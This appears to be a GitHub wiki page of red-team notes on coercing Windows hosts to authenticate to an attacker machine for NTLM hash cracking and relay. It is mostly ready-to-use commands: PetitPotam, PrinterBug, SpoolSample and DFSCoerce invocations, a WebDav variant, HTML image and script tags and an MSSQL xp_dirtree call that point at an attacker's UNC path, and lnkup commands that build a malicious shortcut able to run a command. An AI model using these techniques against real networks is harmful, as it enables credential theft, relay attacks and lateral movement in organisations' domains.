Coercion methods - CraigDonkin/Infrastructure GitHub Wiki

  • Run responder/Inveigh/NTLMrelayx etc on another host, and then coerce authentication
    • Crack NTLM hashes
    • Relay NTLM hashes to SMB
    • Relay NTLM hashes to LDAP
    • Relay NTLM to Web (ADCS etc)

MS-EFSR (PetitPotam)

https://github.com/topotam/PetitPotam

python3 PetitPotam.py -d <domain> -u <username> -p <password> <attacker> <target>

MS-RPRN (PrinterBug)

https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py

printerbug.py '<domain>'/'<user>':'<password>'@'<target>' '<attacker>'

https://github.com/leechristensen/SpoolSample

SpoolSample.exe <target> <attacker>

MS-DFSNM (DFSCoerce)

https://github.com/Wh04m1001/DFSCoerce

dfscoerce.py -d <domain> -u <username> -p <password> <attacker> <target>

Coercer

  • Script that will attempt multiple different coercion attacks

https://github.com/p0dalirius/Coercer

WebDav

  • Check for WebClient enabled

cme smb <target(s)> -d <domain> -u <username> -p <password> -M webdav

  • Force the victim to authenticate via WebDav

python3 PetitPotam.py -d <domain> -u <username> -p <password> <attacker>@80/AAAA <target>

  • It seemed to work best using the FQDN of the attacker host

Email/HTML documents

  • Send an email with a link to the server
  • Use an image or script tag inside an email/HTML file
<img src="\\xxx.xxx.xxx.xxx\image.png" height="1" width="1">
<script language="javascript" src="\\xxx.xxx.xxx.xxx\pwnd\pwnd.js"></script>

MSSQL

EXEC master.sys.xp_dirtree '\\xxx.xxx.xxx.xxx\pwnd',1,1

Windows Shortcuts

.lnk

lnkup.py --host <host> --type ntlm --output evil.lnk
lnkup.py --host <host> --type ntlm --output evil.lnk --execute "<windows command to execute>"
  • Make with PowerShell
# Create the WScript.Shell COM object used to build shortcuts
$link = New-Object -ComObject WScript.Shell
# Path where the .lnk file will be written
$shortcut = $link.CreateShortcut("<\\path\shortcut.lnk>")
# 1 = normal window
$shortcut.WindowStyle = 1
# Icon shown for the shortcut
$shortcut.IconLocation = "<path to icon>"
# Write the .lnk file to disk
$shortcut.Save()